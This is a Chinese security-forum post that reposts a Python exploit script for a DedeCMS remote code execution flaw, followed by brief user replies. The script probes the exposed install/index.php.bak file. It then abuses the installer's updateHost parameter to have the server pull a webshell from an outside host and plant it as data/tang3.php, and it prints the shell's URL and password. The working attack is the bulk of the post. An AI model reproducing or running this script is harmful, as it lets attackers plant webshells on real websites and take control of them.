dedecms远程代码执行利用脚本

90_

转自90sec@Joseph

[Python] 纯文本查看 复制代码

#! /usr/bin/env python
#coding=utf-8
#Joseph(小续)
 
import requests
import sys
import re
def main():
    try:
        url="http://"+sys.argv[1].strip('http://')
    except IndexError:
        print '''
        poc: dede.py [url]http://www.baidu.com/[/url]
        '''
    payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
    urlpoc=url+payload
    code=requests.get(urlpoc).status_code
    if code==200:
        print u"恭喜存在此漏洞"
        print u"Ongoing attacks--->>>>>"
        exploit(url)
        pass
    else:
        print u"sorry 漏洞正在挣扎"
        pass
def exploit(url):
    urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=http://www.mrjking.com/"
    htmlcontent=requests.get(urlpoc).content
    Probe=re.compile(r'存在')
    if Probe.findall(htmlcontent):
        print u'''
        ver:getshell成功
        shell:url+/data/tang3.php?a=0  密码为：c
        '''
        pass
    else:
        print u"请看远程地址是否已经不可用"
        pass
if __name__ == '__main__':
    main()

ayang

学习学习技术，加油！

ljy07

qjf541502724

90 大大  如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

54hacker

支持中国红客联盟(ihonker.org)

Andre

感谢分享，收藏！

Sty，涛

404网安

qjf541502724 发表于 2015-7-26 00:42
90 大大  如果直接就下载了index.php.bak这个文件是不是代表漏洞不存在啊

对的                     

菜鸟小羽

感谢楼主的分享~

ruguoruo

还是不错的哦，顶了